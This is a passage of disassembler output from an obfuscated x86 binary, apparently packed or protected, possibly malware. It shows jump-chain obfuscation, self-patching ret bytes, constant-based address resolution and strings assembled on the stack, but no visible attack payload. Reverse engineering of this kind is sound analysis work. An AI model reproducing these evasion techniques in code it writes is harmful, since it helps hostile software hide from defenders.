		jmp	loc_43B984
sub_450434	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41D080, eax
		lea	eax, loc_451067
		mov	byte ptr [eax],	0C3h
		jmp	loc_451067

; =============== S U B	R O U T	I N E =======================================



sub_450456	proc near		; CODE XREF: sub_41C28D+311p
					; sub_450456+5j
					; DATA XREF: ...
		call	sub_45046B
		jmp	ds:off_41D084
sub_450456	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F879

loc_450461:				; CODE XREF: sub_44F879+Bj
		jmp	nullsub_122
; END OF FUNCTION CHUNK	FOR sub_44F879
; ---------------------------------------------------------------------------

loc_450466:				; CODE XREF: hvvrg7ie:00449609j
		jmp	loc_448EB9

; =============== S U B	R O U T	I N E =======================================



sub_45046B	proc near		; CODE XREF: sub_4471CA:loc_44B4E5j
					; hvvrg7ie:loc_44D2DCj	...

; FUNCTION CHUNK AT 0043C13D SIZE 0000001A BYTES

		call	sub_43B7B9

loc_450470:				; CODE XREF: sub_44A230-9FCFj
		jmp	loc_43C13D
sub_45046B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408FA

loc_450475:				; CODE XREF: sub_4408FA:loc_44087Cj
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44A0A1
		jmp	loc_445174
; END OF FUNCTION CHUNK	FOR sub_4408FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_370. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A1

loc_450487:				; CODE XREF: sub_43F0A1+1Cj
		jmp	nullsub_123
; END OF FUNCTION CHUNK	FOR sub_43F0A1

; =============== S U B	R O U T	I N E =======================================



sub_45048C	proc near		; DATA XREF: sub_43D964-542o
		ror	eax, 9
		mov	ds:dword_439CD4, eax
		retn
sub_45048C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_450496:				; CODE XREF: sub_4408AE+168EDj
		jmp	nullsub_284
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C072

loc_45049B:				; CODE XREF: sub_44C072j
		push	esi
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		call	sub_43C354

loc_4504A6:				; CODE XREF: hvvrg7ie:00455A39j
		cmp	ecx, edi
		jmp	loc_44389C
; END OF FUNCTION CHUNK	FOR sub_44C072

; =============== S U B	R O U T	I N E =======================================



sub_4504AD	proc near		; DATA XREF: sub_44C6D7:loc_43AC6Bo
		call	sub_43B7B1
		push	eax
		mov	eax, esp
		push	0

loc_4504B7:				; CODE XREF: sub_43D285+18453j
		call	sub_450810
sub_4504AD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448663

loc_4504BC:				; CODE XREF: sub_448663+11j
		jmp	loc_445773
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_4504C1:				; CODE XREF: sub_4546E9-1B31j
		rol	ecx, 1Eh
		or	edx, esi
		jmp	loc_441C18
; ---------------------------------------------------------------------------

loc_4504CB:				; CODE XREF: sub_4546E9-D4Dj
		push	offset loc_4549F4
		jmp	nullsub_192
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4435FA

loc_4504D5:				; CODE XREF: sub_4435FA:loc_44E449j
		jz	loc_44972F
		jmp	loc_44A85B
; END OF FUNCTION CHUNK	FOR sub_4435FA

; =============== S U B	R O U T	I N E =======================================



sub_4504E0	proc near		; CODE XREF: sub_43F227+2D4Fp
					; hvvrg7ie:004562F4j

; FUNCTION CHUNK AT 00441FC7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004446CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D59 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	edx, ebx
		or	eax, 0F4B15291h
		jmp	loc_455D59
sub_4504E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4504F1:				; CODE XREF: hvvrg7ie:00441D0Aj
		pop	edi
		rol	edi, 1Eh
		or	edi, ds:4000FBh
		js	loc_449C10
		sub	eax, edi
		adc	ecx, 5D29F196h
		jmp	loc_43ED7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C989

loc_45050E:				; CODE XREF: sub_43C989+Cj
		jnz	loc_43B268
		jmp	loc_4401D6
; END OF FUNCTION CHUNK	FOR sub_43C989
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451B35

loc_450519:				; CODE XREF: sub_451B35+Bj
		call	sub_43EED4
; END OF FUNCTION CHUNK	FOR sub_451B35
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_45051E:				; CODE XREF: sub_44616F+7j
		jmp	loc_450C7A
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		ror	ecx, 10h
		jmp	sub_4529EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540B2

loc_45052B:				; CODE XREF: sub_4540B2:loc_4577F7j
		jge	loc_443DAC
; END OF FUNCTION CHUNK	FOR sub_4540B2
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_450531:				; CODE XREF: sub_43E128+3AA1j
		jmp	loc_456F8E
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D622

loc_450536:				; CODE XREF: sub_43D622+Dj
		jmp	nullsub_429
; END OF FUNCTION CHUNK	FOR sub_43D622
; ---------------------------------------------------------------------------
		shl	ecx, 18h
		jmp	loc_443DA6
; ---------------------------------------------------------------------------
		add	eax, 999E2FACh
		jmp	sub_45A7E8
; ---------------------------------------------------------------------------
		and	ecx, ebx
		jmp	sub_4598CF
; ---------------------------------------------------------------------------

loc_450555:				; DATA XREF: sub_44321C+7o
		mov	byte ptr [eax],	0C3h
		jmp	loc_451417
; ---------------------------------------------------------------------------

loc_45055D:				; CODE XREF: hvvrg7ie:0044B38Cj
		mov	eax, [esp]
		push	edx
		call	sub_45329F
		mov	eax, 0EF9F7D01h
		call	sub_450C5A
		mov	ds:dword_41D06C, eax
		lea	eax, nullsub_442
		jmp	loc_44C562
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44081B

loc_450582:				; CODE XREF: sub_44081B+1Aj
		lea	eax, nullsub_61
		mov	byte ptr [eax],	0C3h
		jmp	loc_440CEF
; END OF FUNCTION CHUNK	FOR sub_44081B

; =============== S U B	R O U T	I N E =======================================



sub_450590	proc near		; CODE XREF: sub_40D20A+11Dp
					; hvvrg7ie:0044D41Dj
					; DATA XREF: ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043AF69 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043B75E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004439BA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044CE45 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D428 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E2CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045020E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450AF5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455A3F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045766B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458828 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004596B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A85A SIZE 00000015 BYTES

		push	edi
		push	0DDE5F347h
		pop	edi
		sub	edi, 3DC45B15h
		jmp	loc_43B75E
sub_450590	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45265D

loc_4505A2:				; CODE XREF: sub_45265D+Dj
		jb	loc_43B121
		jmp	loc_4550F3
; END OF FUNCTION CHUNK	FOR sub_45265D
; ---------------------------------------------------------------------------

loc_4505AD:				; CODE XREF: hvvrg7ie:00442868j
		cmp	eax, 0EC58BE12h
		jmp	loc_439B71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_4505B8:				; CODE XREF: sub_4512A0+1j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		jmp	loc_455BB7
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_4505C3:				; CODE XREF: sub_451E6D:loc_44159Aj
		mov	ebp, esp
		push	ecx
		jnz	loc_43A9F7
		inc	ds:dword_43D6CC
		lea	eax, nullsub_15
		mov	byte ptr [eax],	0C3h
		call	nullsub_16
		push	edi
		jmp	loc_45B7E4
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------

loc_4505E6:				; CODE XREF: hvvrg7ie:00447634j
		jb	loc_44D38C
		cdq
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_4505ED:				; CODE XREF: sub_453EFC:loc_4522CEj
		xor	edi, 88EFEE0Ah
		add	edi, 0C10BF5C3h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_483
		jmp	loc_453BFE
; END OF FUNCTION CHUNK	FOR sub_453EFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B036

loc_450607:				; CODE XREF: sub_45B036:loc_43F51Cj
		push	offset loc_446A7B
		jmp	nullsub_450
; END OF FUNCTION CHUNK	FOR sub_45B036
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF7D

loc_450611:				; CODE XREF: sub_44CF7D:loc_44FA5Dj
		mov	[ebp-0Ch], eax
		call	sub_43C421

loc_450619:				; CODE XREF: sub_450AA8-D347j
		jmp	loc_43B339
; END OF FUNCTION CHUNK	FOR sub_44CF7D

; =============== S U B	R O U T	I N E =======================================



sub_45061E	proc near		; DATA XREF: sub_440643+13449o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004393B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CDA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D320 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043D50A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E170 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FF48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441314 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00441385 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004416A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004434CC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004458BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004491C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A904 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004510B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D6C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004554A1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045566A SIZE 00000005 BYTES

		add	esi, 0B77A5ABEh
		add	eax, esi
		pop	esi
		push	eax
		push	edx
		push	0C2A88A29h
		pop	edx
		jmp	loc_441314
sub_45061E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_450634:				; CODE XREF: sub_450C5A-11693j
		mov	[esi], eax
		jmp	loc_443B53
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45063B:				; CODE XREF: sub_44388C:loc_43ED18j
		or	eax, 0BC89D20Bh
		sub	eax, 0C417D72Dh
		jns	loc_45B954

loc_45064D:				; CODE XREF: sub_45AF9C+12j
		jmp	loc_44DEB9
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------

loc_450652:				; CODE XREF: hvvrg7ie:00453C33j
		jmp	locret_43AA47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_450657:				; CODE XREF: sub_454463-1739j
		jmp	nullsub_188
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
		pop	esi
		mov	esi, 712C71CAh
		jmp	loc_445BD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A91A

loc_450667:				; CODE XREF: sub_44A91A:loc_43CB3Bj
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		push	offset sub_44FF13
		jmp	loc_44FCD9
; END OF FUNCTION CHUNK	FOR sub_44A91A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_499. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_450678:				; CODE XREF: sub_45889B-81A7j
		jmp	loc_44BD1C
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_45067D:				; CODE XREF: hvvrg7ie:00444121j
		jmp	loc_44D552
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D53

loc_450682:				; CODE XREF: sub_449D53-735Fj
		jmp	loc_44AEAA
; END OF FUNCTION CHUNK	FOR sub_449D53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_450687:				; CODE XREF: sub_440643+10j
		jmp	loc_4528B2
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B2D

loc_45068C:				; CODE XREF: sub_459B2D+13j
		jnz	loc_439274
		jmp	loc_44950A
; END OF FUNCTION CHUNK	FOR sub_459B2D
; ---------------------------------------------------------------------------

loc_450697:				; CODE XREF: hvvrg7ie:004461BDj
		or	ebx, edx
		popf

loc_45069A:				; CODE XREF: hvvrg7ie:0043EFBDj
		add	edx, 0ED995FA8h
		push	offset sub_43ABE4
		jmp	locret_43C94D
; ---------------------------------------------------------------------------

loc_4506AA:				; CODE XREF: hvvrg7ie:loc_449737j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_4506AB:				; CODE XREF: sub_441167-2E42j
		jmp	loc_4558CB
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB20

loc_4506B0:				; CODE XREF: sub_44EB20+13j
		jno	loc_44A628
		sub	esi, 87348D1h
		and	ebx, edx
; END OF FUNCTION CHUNK	FOR sub_44EB20
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4506BE:				; CODE XREF: sub_440643:loc_4549DFj
		sub	esi, 7887C4D3h
		cmp	esi, 125E473Dh
		jmp	loc_43D54E
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_4506CF:				; CODE XREF: sub_446F26:loc_44C241j
		jnz	loc_43CB88
		jmp	loc_44208D
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_4506DA:				; CODE XREF: sub_440C61:loc_4461DDj
		mov	ds:dword_448CF0, eax
		mov	eax, [ebp-0Ch]
		push	5F8015C8h
		pop	ecx
		rol	ecx, 1Ch
		jmp	loc_459368
; END OF FUNCTION CHUNK	FOR sub_440C61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4506F0:				; CODE XREF: sub_45889B-16B09j
					; sub_455B13-2B4Ej ...
		add	dword ptr [ebp-4], 8
		jmp	loc_450678
; END OF FUNCTION CHUNK	FOR sub_45889B

; =============== S U B	R O U T	I N E =======================================



sub_4506F9	proc near		; CODE XREF: sub_457532+4p
					; sub_457F95+9j
		push	offset sub_43F4BC
		jmp	sub_4590B2
sub_4506F9	endp

; ---------------------------------------------------------------------------
		popf
		jmp	sub_450EE2
; ---------------------------------------------------------------------------

loc_450709:				; CODE XREF: hvvrg7ie:loc_444B61j
		jz	loc_44846C
		jmp	loc_44A3ED
; ---------------------------------------------------------------------------

loc_450714:				; DATA XREF: hvvrg7ie:00447516o
		mov	edx, 0A22F8A70h
		call	sub_445616
		mov	ds:dword_45386C, eax
		call	sub_44DE0A
		mov	edx, 0A2CD59D9h
		call	sub_445616
		mov	ds:dword_44EE2C, eax
		retn
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_450739:				; CODE XREF: hvvrg7ie:00450B36j
					; hvvrg7ie:00453F49j
		call	sub_439549
		test	al, al
		jz	loc_44079A
		jmp	loc_44D513
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_45074B:				; CODE XREF: sub_43D531:loc_444016j
		call	sub_457C82
		jmp	sub_44E410
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
		jmp	loc_4451E2
; ---------------------------------------------------------------------------

loc_45075A:				; CODE XREF: hvvrg7ie:loc_458EFFj
		test	eax, 2
		jz	loc_4451E2
		jmp	loc_439A5B
; ---------------------------------------------------------------------------

loc_45076A:				; CODE XREF: hvvrg7ie:00450C32j
		cmp	dword ptr [eax-1Ch], 0F6h
		setz	al
		jmp	loc_43B667
; ---------------------------------------------------------------------------

loc_450779:				; CODE XREF: hvvrg7ie:loc_450C18j
		mov	eax, [ebp+8]
		test	byte ptr [eax-10h], 38h
		jnz	loc_4463AD
		mov	eax, [ebp+8]
		push	eax
		jmp	loc_43B65A
; ---------------------------------------------------------------------------
		adc	esi, 0AF884892h

loc_450795:				; CODE XREF: hvvrg7ie:loc_4524DDj
		jmp	loc_44F4F8
; ---------------------------------------------------------------------------

loc_45079A:				; DATA XREF: sub_447E98o
		call	sub_4507AA
		jmp	ds:off_41D070
; ---------------------------------------------------------------------------

loc_4507A5:				; CODE XREF: hvvrg7ie:004425A9j
		jmp	loc_459C13

; =============== S U B	R O U T	I N E =======================================



sub_4507AA	proc near		; CODE XREF: sub_44017B+Dj
					; hvvrg7ie:0044397Aj ...

; FUNCTION CHUNK AT 00444B66 SIZE 00000005 BYTES

		pop	edx
		push	offset sub_43DEC3
		jmp	loc_444B66
sub_4507AA	endp

; ---------------------------------------------------------------------------
		test	esi, 2D79791Fh
		jmp	loc_450240
; ---------------------------------------------------------------------------

loc_4507C0:				; DATA XREF: hvvrg7ie:00458EE6o
		push	eax
		mov	eax, edx
		xchg	eax, [esp]
		call	sub_44CEC8
		mov	eax, 8D800AAh
		jmp	loc_458C19
; ---------------------------------------------------------------------------

loc_4507D5:				; CODE XREF: hvvrg7ie:0044A5C1j
		shl	ebx, 17h
		sub	ecx, eax
		sbb	ebp, ecx
; START	OF FUNCTION CHUNK FOR sub_452F0E

loc_4507DC:				; CODE XREF: sub_452F0E:loc_44A5AFj
		rol	edi, 1Eh

loc_4507DF:				; CODE XREF: hvvrg7ie:loc_4453AFj
		or	edi, 0D77934A0h
		add	edi, 28696467h
		add	edi, ebp
		jmp	loc_452B43
; END OF FUNCTION CHUNK	FOR sub_452F0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FED8

loc_4507F2:				; CODE XREF: sub_44FED8:loc_44FEDFj
		rol	eax, 13h
		sub	eax, 90ACFBE9h
		add	eax, 98CA768Fh
		popf
		xchg	eax, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44FED8
; ---------------------------------------------------------------------------

loc_45080A:				; CODE XREF: hvvrg7ie:00446456j
		adc	ecx, 31EE4C04h

; =============== S U B	R O U T	I N E =======================================



sub_450810	proc near		; CODE XREF: sub_4504AD:loc_4504B7p

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043AC25 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043ACA2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E792 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441D72 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044B99D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C29C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458050 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00459B57 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B635 SIZE 00000011 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	edx, esp
		call	sub_45ADCB

loc_45081B:				; CODE XREF: hvvrg7ie:00449F65j
		jmp	loc_43ACA2
sub_450810	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9B0

loc_450820:				; CODE XREF: sub_44C9B0-447Ej
		jmp	loc_43AD49
; END OF FUNCTION CHUNK	FOR sub_44C9B0
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_4589CD
; ---------------------------------------------------------------------------

loc_45082B:				; CODE XREF: hvvrg7ie:0044C3A6j
		jz	loc_44C2A8
		jmp	loc_43F4E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_450836:				; CODE XREF: sub_4413A5:loc_453244j
		jnz	loc_43B1CE
		jmp	loc_43DE30
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
		cdq
		mov	ecx, [ebx]
		jmp	sub_44346F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_450849:				; CODE XREF: sub_4500FA-7F8Cj
		jo	loc_4440E6
		jmp	loc_45AC5E
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B6B

loc_450854:				; CODE XREF: sub_446B6B:loc_44CE12j
					; hvvrg7ie:0044ECD7j
		xor	ebx, 62D71EE6h
		add	ebx, 4CA080DEh
		add	eax, ebx
; END OF FUNCTION CHUNK	FOR sub_446B6B
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_450862:				; CODE XREF: sub_44BEBB-5CF7j
		call	sub_44AB2D

loc_450867:				; CODE XREF: hvvrg7ie:00458FBFj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_45086C:				; CODE XREF: sub_451669-89C7j
		jmp	loc_452DAB
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_450871:				; CODE XREF: sub_43B3BE+10j
					; hvvrg7ie:loc_44DDE7j
		jmp	loc_45B7AC
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B83

loc_450876:				; CODE XREF: sub_452B83:loc_448D09j
		push	offset sub_44B7CB
		jmp	nullsub_392
; END OF FUNCTION CHUNK	FOR sub_452B83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_450880:				; CODE XREF: hvvrg7ie:0043D242j
					; sub_440AD9:loc_45993Aj
		add	eax, 0F1D907D0h
		add	eax, ebp
		add	eax, 0F570991h
		mov	dword ptr [eax], 70736957h
		lea	eax, [ebp-1Ch]
		mov	dword ptr [eax], 646E6957h
		jmp	loc_4438C5
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_4508A2:				; CODE XREF: sub_43D531:loc_43C164j
		jz	loc_44D945
		jmp	loc_442125
; END OF FUNCTION CHUNK	FOR sub_43D531

; =============== S U B	R O U T	I N E =======================================



sub_4508AD	proc near		; DATA XREF: sub_44191F+9581o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A2F9 SIZE 00000005 BYTES

		popf
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_43A2F9
sub_4508AD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4508B6	proc near		; CODE XREF: hvvrg7ie:loc_43C501p
					; sub_446E8C:loc_453C68j ...

; FUNCTION CHUNK AT 00448CD8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045385D SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	edx, 836ED42Fh
		push	edx
		jmp	loc_45385D
sub_4508B6	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_489. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451BAD

loc_4508C7:				; CODE XREF: sub_451BAD-4DF9j
		jmp	loc_458841
; END OF FUNCTION CHUNK	FOR sub_451BAD
; ---------------------------------------------------------------------------

loc_4508CC:				; CODE XREF: hvvrg7ie:0044A0FAj
					; hvvrg7ie:0044B87Ej
		jmp	loc_43FD74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_4508D1:				; CODE XREF: sub_456CD4:loc_44C9E1j
					; hvvrg7ie:0044C9F0j
		and	edi, 97D5F22Dh
		rol	edi, 12h
		xor	edi, 58F9DCDBh
		add	edi, ebp
		add	edi, 6FB06365h
		mov	[edi], eax
		jmp	loc_4447A7
; END OF FUNCTION CHUNK	FOR sub_456CD4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_268. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_4508F0:				; CODE XREF: sub_44191F-1D39j
		jmp	loc_4570CE
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_4508F5:				; CODE XREF: sub_45B9BB-1EAC0j
		jmp	loc_457E8D
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4508FA:				; CODE XREF: sub_440643+1227Dj
		call	sub_45128D

loc_4508FF:				; CODE XREF: sub_450DF9+3j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_450904:				; CODE XREF: sub_443452+2B6Cj
		jmp	loc_451E42
; END OF FUNCTION CHUNK	FOR sub_443452
; ---------------------------------------------------------------------------

loc_450909:				; CODE XREF: hvvrg7ie:00444686j
		jmp	loc_448A57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_45090E:				; CODE XREF: sub_446D8D-8D03j
		jmp	loc_45A2AF
; END OF FUNCTION CHUNK	FOR sub_446D8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_357. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450914:				; CODE XREF: hvvrg7ie:0044030Dj
		jmp	loc_4531C6
; ---------------------------------------------------------------------------

loc_450919:				; CODE XREF: hvvrg7ie:loc_4493E4j
		pop	ecx
		call	sub_443DF4

loc_45091F:				; CODE XREF: hvvrg7ie:loc_43C96Aj
		xor	ecx, 0E9DF8CACh
		sub	ecx, 58A32871h
		rol	ecx, 18h
		add	ecx, 0CAD4817Eh
		xchg	ecx, [esp]
		jmp	sub_4585EE
; ---------------------------------------------------------------------------

loc_45093C:				; CODE XREF: hvvrg7ie:00443675j
		js	loc_454B84

loc_450942:				; CODE XREF: hvvrg7ie:0044E0B5j
		shl	esi, 14h
		jnz	loc_452252

loc_45094B:				; CODE XREF: hvvrg7ie:loc_44A668j
		mov	eax, 0DD70DD34h
		call	sub_44059F
		sub	eax, 0B2698032h
		rol	eax, 1Dh
		jmp	loc_4452F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_450963:				; CODE XREF: sub_446966:loc_44CC99j
		pushf
		js	loc_452A7F
		push	36FE0E38h
		jmp	loc_44F8E8
; END OF FUNCTION CHUNK	FOR sub_446966

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_450974	proc near		; CODE XREF: sub_440631+155D7j
		retn
sub_450974	endp

; ---------------------------------------------------------------------------

loc_450975:				; CODE XREF: hvvrg7ie:0044F76Aj
		jmp	loc_450A12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B5

loc_45097A:				; CODE XREF: sub_44A1B5+1Bj
		jmp	loc_45A2E3
; END OF FUNCTION CHUNK	FOR sub_44A1B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_45097F:				; CODE XREF: sub_448BC0-40E2j
		jmp	loc_43D750
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_450984:				; CODE XREF: sub_43F227:loc_4538C8j
		jle	loc_447A01
		xchg	edx, [eax]
		jmp	loc_44930B
; ---------------------------------------------------------------------------

loc_450991:				; CODE XREF: sub_43F227:loc_450FA0j
		cmp	dword ptr [ebp-4], 6

loc_450995:				; CODE XREF: sub_44736C:loc_44A3A7j
		jnz	loc_44930B
		jmp	loc_451453
